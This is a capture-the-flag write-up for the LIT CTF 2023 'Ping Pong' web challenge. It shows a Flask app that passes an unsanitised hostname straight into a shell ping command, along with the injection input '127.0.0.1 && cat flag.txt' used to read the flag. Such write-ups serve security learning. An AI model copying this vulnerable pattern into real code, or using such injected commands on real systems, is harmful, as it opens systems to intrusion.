LIT CTF 2023 - Ping Pong
Description
Category: Web
I made this cool website where you can ping other websites!
Resolution
We got the souce code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
from flask import Flask, render_template, redirect, request
import os
app = Flask(__name__)
@app.route('/', methods = ['GET','POST'])
def index():
output = None
if request.method == 'POST':
hostname = request.form['hostname']
cmd = "ping -c 3 " + hostname
output = os.popen(cmd).read()
return render_template('index.html', output=output)
We can see that hostname
variable is not sanitized so we can inject another command to print the flag: 127.0.0.1 && cat flag.txt
.
We get the flag: LITCTF{I_sh0uld_b3_m0r3_c4r3ful}
.
This post is licensed under
CC BY 4.0
by the author.